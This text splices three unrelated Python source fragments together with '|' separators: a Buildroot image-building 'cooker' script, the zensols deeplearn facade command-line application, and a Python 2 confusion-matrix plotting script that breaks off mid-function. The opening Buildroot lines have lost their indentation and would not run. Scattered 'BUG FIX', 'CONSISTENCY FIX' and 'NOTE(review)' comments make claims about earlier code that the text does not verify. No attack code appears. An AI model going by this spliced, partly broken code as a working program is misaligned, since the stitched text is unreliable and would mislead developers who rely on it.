if not "-overlay" in f:
return f
def has_custom_dts (self):
return self.custom_dts() is not None
def devicetree (self):
return "{}/{}".format(self.board_dir(), self.custom_dts())
def mkconfig (self, br_config):
echo("# {} layer".format(self.name), br_config)
cat_dump(self.defconfig(), br_config)
for layer in self.layers:
cat_dump(self.board_dir() +"/" +layer + "-layer.dts", self.board_dir() + "/" + self.custom_dts())
# shared but standard attributes
if self.has_custom_dts():
file_append(br_config, "BR2_LINUX_KERNEL_CUSTOM_DTS_PATH=\"{}\"".format(self.board_dir() + "/" + self.custom_dts()))
if exists("{}/uboot-fragments".format(self.board_dir())):
file_append(br_config, "BR2_TARGET_UBOOT_CONFIG_FRAGMENT_FILES=\"{}\"".format(self.board_dir() + "/uboot-fragments"))
class Image:
    """A buildroot image recipe: pre-configure hooks plus target boards."""

    def __init__(self, name, pre_config_hooks=None, boards=None):
        """Create an image recipe.

        Args:
            name: recipe directory name under ``$BR2_EXTERNAL/recipes``.
            pre_config_hooks: hooks to run before configuring the image.
            boards: boards this image is built for.
        """
        self.name = name
        # BUG FIX: avoid shared mutable default lists.
        self.pre_config_hooks = pre_config_hooks if pre_config_hooks is not None else []
        # keep the original copy semantics: store our own list of the boards
        self.boards = list(boards) if boards is not None else []

    def recipe_dir(self):
        """Return the recipe's directory under the BR2 external tree."""
        return "{}/recipes/{}".format(os.environ["BR2_EXTERNAL"], self.name)

    def defconfig(self, work_dir):
        """Return the recipe's defconfig path (``work_dir`` is unused)."""
        return "{}/{}_defconfig".format(self.recipe_dir(), self.name)

    def clean(self, work_dir):
        """ cleans given image """
        # BUG FIX: the attribute is ``pre_config_hooks``; the previous
        # ``pre_configure_hooks`` name raised AttributeError.
        for hk in self.pre_config_hooks:
            hk.clean()

    def cook(self, work_dir):
        """ builds given image """
        for hk in self.pre_config_hooks:
            hk.run()
        for b in self.boards:
            br_dir = work_dir + "/buildroot"
            br_config = br_dir + "/configs/{}_defconfig".format(self.name)
            cprint.info("applying {} board layer".format(b.name))
            # start from a clean defconfig, then layer board + recipe config
            rmf(br_config)
            b.mkconfig(br_config)
            cprint.info("cooking {} recipe".format(self.name))
            if exists("{}/overlay".format(self.recipe_dir())):
                file_append(br_config, 'BR2_ROOTFS_OVERLAY=\"{}\"'.format(self.recipe_dir() + "/overlay"))
            if exists("{}/patches".format(self.recipe_dir())):
                file_append(br_config, 'BR2_GLOBAL_PATCH_DIR=\"{}\"'.format(self.recipe_dir() + "/patches"))
            if exists("{}/linux-fragments".format(self.recipe_dir())):
                file_append(br_config, "BR2_LINUX_KERNEL_CONFIG_FRAGMENT_FILES=\"{}\"".format(self.recipe_dir() + "/linux-fragments"))
            if exists("{}/busybox-fragments".format(self.recipe_dir())):
                file_append(br_config, 'BR2_PACKAGE_BUSYBOX_CONFIG_FRAGMENT_FILES=\"{}\"'.format(self.recipe_dir() + "/busybox-fragments"))
            cat_dump(self.defconfig(work_dir), br_config)
            # NOTE: a ``b.arch()`` call used to sit here but its result was
            # never used; it has been removed.
            make(dest=br_dir, target="{}_defconfig".format(self.name))
            make(dest=br_dir)
            cprint.info("image ready!")
            cprint.info(str(os.listdir(work_dir + "/image")))
class Cooker:
    """Ordered collection of image recipes and the driver that builds them."""

    def __init__(self, recipes=None):
        """Create a cooker, optionally seeded with a list of recipes."""
        # BUG FIX: a mutable default argument was shared between instances.
        self.recipes = recipes if recipes is not None else []

    def __len__(self):
        return len(self.recipes)

    def pop(self):
        """Remove and return the most recently pushed recipe."""
        # Now returns the removed recipe, matching list.pop convention.
        return self.recipes.pop()

    def push(self, r):
        """Append a recipe to the build queue."""
        self.recipes.append(r)

    def cook(self, work_dir, br2_url, br2_tag):
        """Build every queued recipe and archive its images.

        Args:
            work_dir: directory holding the per-recipe buildroot trees.
            br2_url: git URL of the buildroot repository.
            br2_tag: buildroot branch/tag to clone.
        """
        for r in self.recipes:
            br_dir = work_dir + "/buildroot-{}".format(r.name)
            if not exists(br_dir):
                cprint.warn("Downloading a buildroot")
                git_clone(br2_url, branch=br2_tag, dest=br_dir)
            # remove residues
            rmf(work_dir + "/image")
            rmf(work_dir + "/buildroot")
            symlink(br_dir, work_dir + "/buildroot")
            symlink(br_dir + "/output/images", work_dir + "/image")
            r.cook(work_dir)
            # BUG FIX: the recipe name was not interpolated before, so the
            # literal file "image-{}.zip" was removed instead of the stale
            # archive for this recipe.
            rmf("image-{}.zip".format(r.name))
            zip("image-{}.zip".format(r.name), work_dir + "/image")

    def clean(self, work_dir):
        """Clean every queued recipe and remove generated artifacts."""
        # remove residues
        rmf(work_dir + "/image")
        rmf(work_dir + "/buildroot")
        for r in self.recipes:
            r.clean()
            rmf("image-{}.zip".format(r.name))
def cooker(argv):
    """Command-line driver: parse argv flags, then build or clean recipes.

    Recognized flags: ``--list``, ``--list-boards``, ``--br2-revision``,
    ``--br2-url``, ``--br2-tag``, ``--dl-dir``, ``--work-dir``,
    ``--recipe``, ``--clean``.

    Args:
        argv: the argument list (typically ``sys.argv[1:]``).

    Returns:
        0 for the purely informational flags; otherwise None after
        cooking or cleaning the requested recipes.
    """
    cooker = Cooker()
    clean = False
    recipes = []
    # NOTE(review): dl_dir is parsed below but never used -- confirm intent.
    dl_dir = "~/br2-downloads"
    _br2_external_ = os.environ["BR2_EXTERNAL"]
    work_dir = _br2_external_
    br2_url = "https://github.com/buildroot/buildroot"
    br2_tag = "2021.08.2"
    for i in range(0, len(argv)):
        if argv[i] == "--list":
            # list every recipe directory containing a "recipe" file
            recipes = []
            files = os.listdir(_br2_external_ + "/recipes")
            for f in files:
                if exists(_br2_external_ + "/recipes/{}/recipe".format(f)):
                    recipes.append(f)
            print(recipes)
            return 0
        if argv[i] == "--list-boards":
            # list every board directory containing a "config" file
            boards = []
            files = os.listdir(_br2_external_ + "/boards")
            for f in files:
                if exists(_br2_external_ + "/boards/{}/config".format(f)):
                    boards.append(f)
            print(boards)
            return 0
        if argv[i] == "--br2-revision":
            # NOTE(review): prints the default tag unless --br2-tag appeared
            # EARLIER in argv -- flag order matters here.
            print("Buildroot revision : {}".format(br2_tag))
            return 0
        if argv[i] == "--br2-url":
            br2_url = argv[i+1]
        if argv[i] == "--br2-tag":
            br2_tag = argv[i+1]
        if argv[i] == "--dl-dir":
            dl_dir = argv[i+1]
        if argv[i] == "--work-dir":
            work_dir = argv[i+1]
        if argv[i] == "--recipe":
            path = argv[i+1]
            if not "/" in path:
                # bare recipe name: resolve against the external tree
                recipe_name = path
                path = _br2_external_ + "/recipes/{}/recipe".format(recipe_name)
            else:
                recipe_name = path.split("/")[-1]
            # BUG FIX: the recipe file handle was previously left open; a
            # context manager closes it deterministically.
            with open(path, "r") as recipe_fd:
                recipe = json.loads(recipe_fd.read())
            boards = []
            pre_config_hooks = []
            if "pre_configure_hooks" in recipe:
                hooks = recipe["pre_configure_hooks"][0]
                for k in hooks.keys():
                    pre_config_hooks.append(Hook(k, hooks[k]))
            bds = recipe["boards"][0]
            for board in bds.keys():
                bd = Board(bds[board]["board"], layers=[])
                boards.append(bd)
            recipe = Image(recipe_name, pre_config_hooks=pre_config_hooks, boards=boards)
            cooker.push(recipe)
        if argv[i] == "--clean":
            clean = True
    if clean:
        cooker.clean(work_dir)
    else:
        # make sure requirements have run
        for hook in DEFAULT_PRE_CONFIGURE_HOOKS:
            hk = Hook(hook["output"], hook)
            hk.run()
        # cook requested recipes
        cooker.cook(work_dir, br2_url, br2_tag)
# Script entry point: forward the command-line arguments (without argv[0])
# to the CLI driver.
if __name__ == "__main__":
    cooker(sys.argv[1:])
|
"""Command line entry point to the application using the application CLI.
"""
__author__ = 'plandes'
from typing import Dict, Any, List, Type, Union
from dataclasses import dataclass, field
from enum import Enum, auto
import logging
import gc
import sys
import itertools as it
import copy as cp
from io import TextIOBase
from pathlib import Path
from zensols.persist import dealloc, Deallocatable, PersistedWork, persisted
from zensols.config import (
Writable, Configurable, ImportConfigFactory, DictionaryConfig
)
from zensols.cli import (
ApplicationError, Application, ApplicationFactory,
ActionCliManager, Invokable, CliHarness,
)
from zensols.dataset import (
SplitStashContainer, StratifiedStashSplitKeyContainer
)
from zensols.deeplearn import DeepLearnError, TorchConfig
from zensols.deeplearn.model import ModelFacade, ModelError
from zensols.deeplearn.result import (
ModelResultManager, ModelResultReporter, PredictionsDataFrameFactory,
ModelResultComparer
)
logger = logging.getLogger(__name__)
class InfoItem(Enum):
    """Indicates what information to dump in
    :meth:`.FacadeInfoApplication.print_information`.
    """
    # each member selects one writer callable in print_information's
    # dispatch table
    meta = auto()
    param = auto()
    model = auto()
    config = auto()
    batch = auto()
class ClearType(Enum):
    """Indicates what type of data to delete (clear).
    """
    # none: delete nothing; batch: clear created batches; source: also clear
    # the batches' upstream source data (see FacadeBatchApplication.batch)
    none = auto()
    batch = auto()
    source = auto()
@dataclass
class FacadeApplication(Deallocatable):
    """Base class for applications that use :class:`.ModelFacade`.

    """
    CLI_META = {'mnemonic_excludes': {'get_cached_facade', 'create_facade',
                                      'deallocate', 'clear_cached_facade'},
                'option_overrides': {'model_path': {'long_name': 'model',
                                                    'short_name': None}}}
    """Tell the command line app API to ignore subclass and client specific use
    case methods.

    """
    config: Configurable = field()
    """The config used to create facade instances."""

    facade_name: str = field(default='facade')
    """The client facade."""

    # simply copy this field and documentation to the implementation class to
    # add model path location (for those subclasses that don't have the
    # ``CLASS_INSPECTOR`` class level attribute set (see
    # :obj:`~zensols.util.introspect.inspect.ClassInspector.INSPECT_META`);
    # this can also be set as a parameter such as with
    # :meth:`.FacadeModelApplication.test`
    model_path: Path = field(default=None)
    """The path to the model or use the last trained model if not provided.

    """
    config_factory_args: Dict[str, Any] = field(default_factory=dict)
    """The arguments given to the :class:`~zensols.config.ImportConfigFactory`,
    which could be useful for reloading all classes while debugging.

    """
    config_overwrites: Configurable = field(default=None)
    """A configurable that clobbers any configuration in :obj:`config` for those
    sections/options set.

    """
    def __post_init__(self):
        # resources (factories, facades) deallocated with this application
        self.dealloc_resources = []
        # backing store for get_cached_facade; the True flag ties the cached
        # value's deallocation to this instance
        self._cached_facade = PersistedWork('_cached_facade', self, True)

    def _enable_cli_logging(self, facade: ModelFacade):
        # turn off the progress bar and route model logging to the CLI
        facade.progress_bar = False
        facade.configure_cli_logging()

    def create_facade(self) -> ModelFacade:
        """Create a new instance of the facade."""
        # we must create a new (non-shared) instance of the facade since it
        # will get deallocated after complete.
        config = self.config
        model_path = self.model_path
        if self.config_overwrites is not None:
            # merge the overwrites into a deep copy so self.config is
            # left untouched
            config = cp.deepcopy(config)
            config.merge(self.config_overwrites)
        if model_path is None:
            cf = ImportConfigFactory(config, **self.config_factory_args)
            facade: ModelFacade = cf.instance(self.facade_name)
            if logger.isEnabledFor(logging.DEBUG):
                logger.debug(f'created facade: {facade}')
            self.dealloc_resources.extend((cf, facade))
        else:
            # restore a previously trained model from disk
            if logger.isEnabledFor(logging.INFO):
                logger.info(f'loading model from {model_path}')
            with dealloc(ImportConfigFactory(
                    config, **self.config_factory_args)) as cf:
                cls: Type[ModelFacade] = cf.get_class(self.facade_name)
                facade: ModelFacade = cls.load_from_path(model_path)
                if logger.isEnabledFor(logging.DEBUG):
                    logger.debug(f'created facade: {type(facade)} ' +
                                 f'from path: {model_path}')
            self.dealloc_resources.append(facade)
        return facade

    @persisted('_cached_facade')
    def get_cached_facade(self, path: Path = None) -> ModelFacade:
        """Return a created facade that is cached in this application instance.

        """
        # ``path`` is unused; the decorator caches the created facade
        return self.create_facade()

    def clear_cached_facade(self):
        """Clear any cached facade this application instance.

        """
        if self._cached_facade.is_set():
            self._cached_facade().deallocate()
        self._cached_facade.clear()

    def deallocate(self):
        super().deallocate()
        self._try_deallocate(self.dealloc_resources, recursive=True)
        self._cached_facade.deallocate()
@dataclass
class FacadeInfoApplication(FacadeApplication):
    """Contains methods that provide information about the model via the facade.

    """
    CLI_META = ActionCliManager.combine_meta(
        FacadeApplication,
        {'mnemonic_overrides': {'print_information': 'info'},
         'option_overrides': {'info_item': {'long_name': 'item',
                                            'short_name': 'i'},
                              'debug_value': {'long_name': 'execlevel',
                                              'short_name': None}}})

    def print_information(self, info_item: InfoItem = None):
        """Output facade data set, vectorizer and other configuration information.

        :param info_item: what to print

        """
        # see :class:`.FacadeApplicationFactory`
        def write_batch():
            # show only the first two batches to keep output short
            for batch in it.islice(facade.batch_stash.values(), 2):
                batch.write()

        # NOTE(review): '_no_op' appears to be set externally to skip the
        # (expensive) facade creation -- confirm with callers
        if not hasattr(self, '_no_op'):
            with dealloc(self.create_facade()) as facade:
                print(f'{facade.model_settings.model_name}:')
                # dispatch table: info item -> writer callable
                fn_map = \
                    {None: facade.write,
                     InfoItem.meta: facade.batch_metadata.write,
                     InfoItem.param: facade.executor.write_settings,
                     InfoItem.model: facade.executor.write_model,
                     InfoItem.config: facade.config.write,
                     InfoItem.batch: write_batch}
                fn = fn_map.get(info_item)
                if fn is None:
                    raise DeepLearnError(f'No such info item: {info_item}')
                fn()

    def debug(self, debug_value: int = None):
        """Debug the model.

        :param debug_value: the executor debugging level

        """
        # default to boolean True when no level is given
        debug_value = True if debug_value is None else debug_value
        with dealloc(self.create_facade()) as facade:
            facade.debug(debug_value)
@dataclass
class FacadeResultApplication(FacadeApplication):
    """Contains methods that dump previous results.

    """
    CLI_META = ActionCliManager.combine_meta(
        FacadeApplication,
        {'mnemonic_overrides': {'result_summary': 'summary',
                                'result_ids': 'resids',
                                'metrics': 'results',
                                'majority_label_metrics': 'majlab',
                                'compare_results': 'cmpres'},
         'option_overrides': {'include_validation': {'long_name': 'validation',
                                                     'short_name': None}}})

    def result_summary(self, out_file: Path = None,
                       include_validation: bool = False):
        """Create a summary of all archived results.

        :param out_file: the output path

        :param include_validation: whether or not to include validation
                                   results

        """
        if out_file is None:
            out_file = Path('result-summary.csv')
        with dealloc(self.create_facade()) as facade:
            rm: ModelResultManager = facade.result_manager
            self._enable_cli_logging(facade)
            reporter = ModelResultReporter(rm)
            reporter.include_validation = include_validation
            reporter.dump(out_file)

    def metrics(self, sort: str = 'wF1', res_id: str = None,
                out_file: Path = None):
        """Write a spreadsheet of label performance metrics for a previously
        trained and tested model.

        :param sort: the column to sort results

        :param res_id: the result ID or use the last if not given

        :param out_file: the output path

        """
        if out_file is None:
            out_file = Path('metrics.csv')
        with dealloc(self.create_facade()) as facade:
            df = facade.get_predictions_factory(name=res_id).metrics_dataframe
            # highest scores first
            df = df.sort_values(sort, ascending=False).reset_index(drop=True)
            df.to_csv(out_file)
            self._enable_cli_logging(facade)
            logger.info(f'wrote: {out_file}')

    def result_ids(self):
        """Show all archived result IDs."""
        with dealloc(self.create_facade()) as facade:
            rm: ModelResultManager = facade.result_manager
            print('\n'.join(rm.results_stash.keys()))

    def result(self, res_id: str = None):
        """Show the last results.

        :param res_id: the result ID or use the last if not given

        """
        with dealloc(self.create_facade()) as facade:
            df_fac: PredictionsDataFrameFactory = \
                facade.get_predictions_factory(name=res_id)
            df_fac.result.write()

    def majority_label_metrics(self, res_id: str = None):
        """Show majority label metrics of the test dataset using a previous
        result set.

        :param res_id: the result ID or use the last if not given

        """
        with dealloc(self.create_facade()) as facade:
            pred_factory: PredictionsDataFrameFactory = \
                facade.get_predictions_factory(name=res_id)
            pred_factory.majority_label_metrics.write()

    def compare_results(self, res_id_a: str, res_id_b: str):
        """Compare two previous archived result sets.

        :param res_id_a: the first result ID to compare

        :param res_id_b: the second result ID to compare

        """
        with dealloc(self.create_facade()) as facade:
            # annotation fixed: result_manager is a ModelResultManager; the
            # comparer is constructed from it below
            rm: ModelResultManager = facade.result_manager
            diff = ModelResultComparer(rm, res_id_a, res_id_b)
            diff.write()
@dataclass
class FacadeBatchApplication(FacadeApplication):
    """Create and clear batched data and write dataset statistics.

    """
    CLI_META = ActionCliManager.combine_meta(
        FacadeApplication,
        {'option_overrides':
         {'clear_type': {'long_name': 'ctype',
                         'short_name': None},
          'clear': {'short_name': None},
          'split': {'short_name': None},
          'limit': {'short_name': None}},
         'mnemonic_overrides':
         {'batch': {'option_includes': {'limit', 'clear_type', 'split'}}}})

    def _write_batch_splits(self, facade: ModelFacade):
        # write stratified split counts when the facade's split key
        # container supports it
        scont: SplitStashContainer = facade.batch_stash.split_stash_container
        if hasattr(scont, 'split_container') and \
           isinstance(scont.split_container, StratifiedStashSplitKeyContainer):
            stash: StratifiedStashSplitKeyContainer = scont.split_container
            stash.stratified_write = True
            stash.write()

    def batch(self, limit: int = None, clear_type: ClearType = ClearType.none,
              split: bool = False):
        """Create batches if not already, print statistics on the dataset.

        :param clear_type: what to delete to force recreate

        :param limit: the number of batches to create

        :param split: also write the stratified splits if available

        """
        # NOTE(review): ``limit`` is declared in CLI_META but not referenced
        # in this body -- confirm whether it should cap batch creation
        with dealloc(self.create_facade()) as facade:
            self._enable_cli_logging(facade)
            if clear_type == ClearType.batch:
                logger.info('clearing batches')
                facade.batch_stash.clear()
            elif clear_type == ClearType.source:
                # remove the upstream (source) data as well as the batches
                facade.batch_stash.clear_all()
                facade.batch_stash.clear()
            facade.dataset_stash.write()
            if split:
                self._write_batch_splits(facade)
@dataclass
class FacadeModelApplication(FacadeApplication):
    """Test, train and validate models.

    """
    CLI_META = ActionCliManager.combine_meta(
        FacadeApplication,
        {'option_overrides': {'use_progress_bar': {'long_name': 'progress',
                                                   'short_name': 'p'}},
         'mnemonic_overrides': {'train_production': 'trainprod',
                                'early_stop': {'option_includes': {},
                                               'name': 'stop'}}})

    use_progress_bar: bool = field(default=False)
    """Display the progress bar."""

    def create_facade(self) -> ModelFacade:
        """Create a new instance of the facade."""
        facade = super().create_facade()
        # unlike the base class, honor the progress bar CLI flag
        facade.progress_bar = self.use_progress_bar
        facade.configure_cli_logging()
        return facade

    def train(self):
        """Train the model and dump the results, including a graph of the
        train/validation loss.

        """
        with dealloc(self.create_facade()) as facade:
            facade.train()
            facade.persist_result()

    def test(self, model_path: Path = None):
        """Test an existing model and dump the results of the test.

        :param model_path: the path to the model or use the last trained model
                           if not provided

        """
        self.model_path = model_path
        with dealloc(self.create_facade()) as facade:
            facade.test()

    def train_test(self):
        """Train, test the model, then dump the results with a graph.

        """
        with dealloc(self.create_facade()) as facade:
            facade.train()
            facade.test()
            facade.persist_result()

    def train_production(self):
        """Train, test the model on train and test datasets, then dump the
        results with a graph.

        """
        with dealloc(self.create_facade()) as facade:
            facade.train_production()
            facade.test()
            facade.persist_result()

    def early_stop(self):
        """Stops the execution of training the model.

        """
        with dealloc(self.create_facade()) as facade:
            facade.stop_training()
@dataclass
class FacadePredictApplication(FacadeApplication):
    """An application that provides prediction functionality.

    """
    # CONSISTENCY FIX: every sibling FacadeApplication subclass is a
    # @dataclass; this one was missing the decorator.
    CLI_META = ActionCliManager.combine_meta(
        FacadeApplication, {'mnemonic_overrides':
                            {'predictions': {'name': 'preds'}}})

    def predictions(self, res_id: str = None, out_file: Path = None):
        """Write predictions to a CSV file.

        :param res_id: the result ID or use the last if not given

        :param out_file: the output path

        """
        with dealloc(self.create_facade()) as facade:
            if out_file is None:
                out_file = Path(f'{facade.executor.model_name}.csv')
            try:
                df = facade.get_predictions(name=res_id)
            except ModelError as e:
                raise ApplicationError(
                    'Could not predict, probably need to train a model ' +
                    f'first: {e}') from e
            df.to_csv(out_file)
            self._enable_cli_logging(facade)
            if logger.isEnabledFor(logging.INFO):
                logger.info(f'wrote predictions: {out_file}')
@dataclass
class FacadeApplicationFactory(ApplicationFactory):
    """This is a utility class that creates instances of
    :class:`.FacadeApplication`.  It's only needed if you need to create a
    facade without wanting to invoke the command line attached to the
    applications.

    It does this by only invoking the first pass applications so all the
    correct initialization happens before returning factory artifacts.

    There must be a :obj:`.FacadeApplication.facade_name` entry in the
    configuration tied to an instance of :class:`.FacadeApplication`.

    :see: :meth:`create_facade`

    """
    def create_facade(self, args: List[str] = None,
                      app_args: Dict[str, Any] = None) -> ModelFacade:
        """Create the facade tied to the application without invoking the
        command line.

        :param args: the (would be) command line arguments used to create the
                     application

        :param app_args: the arguments to set on the facade application
                         after it is created and before it creates the facade

        """
        # NOTE(review): 'info' appears to be a cheap first-pass action used
        # only to drive the CLI machinery -- confirm
        create_args = ['info']
        if args is not None:
            create_args.extend(args)
        app: Application = self.create(create_args)
        inv: Invokable = app.invoke_but_second_pass()[1]
        fac_app: FacadeApplication = inv.instance
        if app_args is not None:
            for k, v in app_args.items():
                setattr(fac_app, k, v)
        return fac_app.create_facade()
@dataclass
class FacadeApplicationManager(Writable):
    """A very high level client interface making it easy to configure and run
    models from an interactive environment such as a Python REPL or a Jupyter
    notebook (see :class:`.JupyterManager`)

    """
    cli_harness: CliHarness = field()
    """The CLI harness used to create the facade application."""

    cli_args_fn: List[str] = field(default=lambda: [])
    """Creates the arguments used to create the facade from the application
    factory.

    """
    reset_torch: bool = field(default=True)
    """Reset random state for consistency for each new created facade."""

    allocation_tracking: Union[bool, str] = field(default=False)
    """Whether or not to track resource/memory leaks.  If set to ``stack``, the
    stack traces of the unallocated objects will be printed.  If set to
    ``counts`` only the counts will be printed.  If set to ``True`` only the
    unallocated objects without the stack will be printed.

    """
    logger_name: str = field(default='notebook')
    """The name of the logger to use for logging in the notebook itself."""

    default_logging_level: str = field(default='WARNING')
    """If set, then initialize the logging system using this as the default
    logging level.  This is the upper case logging name such as ``WARNING``.

    """
    progress_bar_cols: int = field(default=120)
    """The number of columns to use for the progress bar."""

    config_overwrites: Dict[str, Dict[str, str]] = field(default_factory=dict)
    """Clobbers any configuration set by :meth:`config` for those
    sections/options set.

    """
    def __post_init__(self):
        if self.allocation_tracking:
            # enable global allocation tracking before any facade is created
            Deallocatable.ALLOCATION_TRACKING = True
        if self.logger_name is not None:
            self.logger = logging.getLogger(self.logger_name)
        else:
            # fall back to this module's logger
            self.logger = logger
        self._facade = None

    def _create_facade(self, args: List[str] = None,
                       app_args: Dict[str, Any] = None) -> ModelFacade:
        """Create the facade tied to the application without invoking the
        command line.

        :param args: the (would be) command line arguments used to create the
                     application

        :param app_args: the arguments to set on the facade application
                         after it is created and before it creates the facade

        """
        # NOTE(review): 'info' appears to be a cheap first-pass action used
        # only to drive the CLI machinery -- confirm
        create_args = ['info']
        if args is not None:
            create_args.extend(args)
        fac_app: FacadeApplication = self.cli_harness.get_instance(create_args)
        assert isinstance(fac_app, FacadeApplication)
        if app_args is not None:
            for k, v in app_args.items():
                setattr(fac_app, k, v)
        return fac_app.create_facade()

    def cleanup(self, include_cuda: bool = True, quiet: bool = False):
        """Report memory leaks, run the Python garbage collector and optionally
        empty the CUDA cache.

        :param include_cuda: if ``True`` clear the GPU cache

        :param quiet: do not report unallocated objects, regardless of the
                      setting of :obj:`allocation_tracking`

        """
        if self.allocation_tracking and not quiet:
            include_stack, only_counts = False, False
            if self.allocation_tracking == 'stack':
                include_stack, only_counts = True, False
            elif self.allocation_tracking == 'counts':
                include_stack, only_counts = False, True
            # NOTE(review): this recomputes the same value assigned by the
            # branches above and is redundant; kept as-is
            include_stack = (self.allocation_tracking == 'stack')
            Deallocatable._print_undeallocated(include_stack, only_counts)
        self.deallocate()
        Deallocatable._deallocate_all()
        gc.collect()
        if include_cuda:
            # free up memory in the GPU
            TorchConfig.empty_cache()

    def deallocate(self):
        """Deallocate all resources in the CLI factory if it exists."""
        if self._facade is not None:
            if self.logger.isEnabledFor(logging.INFO):
                self.logger.info('deallocating old factory')
            self._facade.deallocate()
            self._facade = None

    def config(self, section: str, **kwargs):
        """Add overwriting configuration used when creating the facade.

        :param section: the section to be overwritten (or added)

        :param kwargs: the key/value pairs used as the section data to
                       overwrite

        :see: :meth:`create_facade`

        """
        if section not in self.config_overwrites:
            self.config_overwrites[section] = {}
        self.config_overwrites[section].update(kwargs)

    def clear(self):
        """Clear all post create configuration set with :meth:`config`."""
        self.config_overwrites.clear()

    def create_facade(self, *args) -> ModelFacade:
        """Create and return a facade.  This deallocates and cleans up state
        from any previous facade creation as a side effect.

        :param args: given to the :obj:`cli_args_fn` function to create
                     arguments passed to the CLI

        """
        if len(self.config_overwrites) > 0:
            dconf = DictionaryConfig(self.config_overwrites)
            app_args = {'config_overwrites': dconf}
        else:
            app_args = None
        self.deallocate()
        # reclaim memory running GC and GPU cache clear
        self.cleanup()
        try:
            # reset random state for consistency of each new test
            if self.reset_torch:
                TorchConfig.init()
            # create a factory that instantiates Python objects
            cli_args_fn = self.cli_args_fn(*args)
            # create the facade used for this instance
            self._facade: ModelFacade = self._create_facade(
                cli_args_fn, app_args)
            return self._facade
        except Exception as e:
            try:
                # recover the best we can
                self.cleanup(quiet=True)
                self._facade = None
            except Exception:
                pass
            raise DeepLearnError(f'Could not create facade: {e}') from e

    @property
    def facade(self) -> ModelFacade:
        """The current facade for this notebook instance.

        :return: the existing facade, or that created by :meth:`create_facade`
                 if it doesn't already exist

        """
        if self._facade is None:
            self.create_facade()
        # NOTE(review): presumably clears the facade's default writer on
        # every property access -- confirm intent
        self._facade.writer = None
        return self._facade

    def run(self, display_results: bool = True):
        """Train, test and optionally show results.

        :param display_results: if ``True``, write and plot the results

        """
        try:
            facade = self.facade
            facade.train()
            facade.test()
            if display_results:
                facade.write_result()
                facade.plot_result()
        except Exception as e:
            try:
                facade = None
                # recover the best we can
                self.cleanup(quiet=True)
            except Exception:
                pass
            raise DeepLearnError('Could not run the model') from e

    def show_leaks(self, output: str = 'counts', fail: bool = True):
        """Show all resources/memory leaks in the current facade.  First, this
        deallocates the facade, then prints any lingering objects using
        :class:`~zensols.persist.Deallocatable`.

        **Important**: :obj:`allocation_tracking` must be set to ``True`` for
        this to work.

        :param output: one of ``stack``, ``counts``, or ``tensors``

        :param fail: if ``True``, raise an exception if there are any
                     unallocated references found

        """
        if self._facade is None:
            raise DeepLearnError('No facade created yet')
        if self.allocation_tracking:
            self._facade.deallocate()
            if output == 'counts':
                Deallocatable._print_undeallocated(only_counts=True, fail=fail)
            elif output == 'stack':
                Deallocatable._print_undeallocated(include_stack=True, fail=fail)
            elif output == 'tensors':
                TorchConfig.write_in_memory_tensors()
            else:
                raise DeepLearnError(f'Unknown output type: {output}')
            self._facade = None

    def write(self, depth: int = 0, writer: TextIOBase = sys.stdout,
              include_model=False, include_metadata=False,
              include_settings=False, **kwargs):
        """Write the facade's configuration to ``writer``.

        :param depth: the starting indentation depth

        :param writer: the writer to dump the content of this writable

        """
        self.facade.write(
            depth, writer,
            include_model=include_model,
            include_metadata=include_metadata,
            include_settings=include_settings,
            **kwargs)
@dataclass
class JupyterManager(FacadeApplicationManager):
    """A facade application manager adding Jupyter notebook conveniences:
    browser-width control and notebook-friendly logging setup.

    """
    reduce_logging: bool = field(default=False)
    """Whether to disable most information logging so the progress bar is more
    prevalent.

    """
    browser_width: int = field(default=95)
    """The width of the browser windows as a percentage."""

    def __post_init__(self):
        super().__post_init__()
        if self.browser_width is not None:
            self.set_browser_width(self.browser_width)

    @staticmethod
    def set_browser_width(width: int = 95):
        """Use the entire width of the browser to create more real estate.

        :param width: the width as a percent (``[0, 100]``) to use as the
                      width in the notebook

        """
        from IPython.core.display import display, HTML
        markup = f'<style>.container {{ width:{width}% !important; }}</style>'
        display(HTML(markup))

    def _init_jupyter(self):
        """Initialize the Jupyter notebook by configuring the logging system
        and setting the progress bar.

        """
        if self.reduce_logging:
            # quiet the executor status logger so the progress bar dominates
            logging.getLogger('zensols.deeplearn.model.executor.status').\
                setLevel(logging.WARNING)
            return
        log_level = None
        if self.default_logging_level is not None:
            log_level = getattr(logging, self.default_logging_level)
        # set console based logging
        self.facade.configure_jupyter(
            log_level=log_level,
            progress_bar_cols=self.progress_bar_cols)

    def create_facade(self, *args) -> ModelFacade:
        """Create a facade, then initialize the Jupyter environment for it."""
        facade = super().create_facade(*args)
        # initialize jupyter
        self._init_jupyter()
        return facade
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 6 14:19:32 2020
@author: adele
"""
import cPickle as cpk
from os.path import join as joinP
from collections import Counter
from copy import deepcopy
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import confusion_matrix, f1_score
import matplotlib.pyplot as plt
import seaborn as sns
from utils_general import train_test_proportions, get_pathways_from_nodes, \
is_enz
def from_CM_get_y(m, labels):
    """Reconstruct surrogate ``y_true``/``y_pred`` label lists from a
    confusion matrix ``m`` whose rows are true classes and whose columns are
    predicted classes (labels indexed by ``labels``)."""
    y_true, y_pred = [], []
    for row_idx, row in enumerate(m):
        # every sample of this row shares the same true label
        y_true.extend([labels[row_idx]] * int(np.sum(row)))
        # each cell count contributes that many predicted labels
        for col_idx, count in enumerate(row):
            y_pred.extend([labels[col_idx]] * int(count))
    return y_true, y_pred
def plot_confusion_matrix(cm, classes,
                          normalize=False,
                          cmap=plt.cm.YlGnBu):
    """
    This function prints and plots the confusion matrix ``cm`` (true classes
    as rows, predicted classes as columns) as an annotated heat map.
    Normalization can be applied by setting `normalize=True`.

    cm - 2D array-like confusion matrix
    classes - tick labels, one per class
    normalize - when True, normalize each row to proportions
    cmap - matplotlib colormap for the heat map
    return the matplotlib axis holding the plot
    """
    # BUGFIX: ``normalize`` was previously accepted but silently ignored;
    # normalize each row (true class) to proportions when requested.
    if normalize:
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
    np.set_printoptions(precision=2)
    fig, ax = plt.subplots()
    im = ax.imshow(cm, interpolation='nearest', cmap=cmap)
    ax.figure.colorbar(im, ax=ax)
    # We want to show all ticks...
    ax.set(xticks=np.arange(cm.shape[1]),
           yticks=np.arange(cm.shape[0]),
           # ... and label them with the respective list entries
           xticklabels=classes, yticklabels=classes,
           ylabel='True',
           xlabel='Predicted')
    # Loop over data dimensions and create text annotations.
    fmt = '.2f'
    # cells darker than half the maximum get white text for contrast
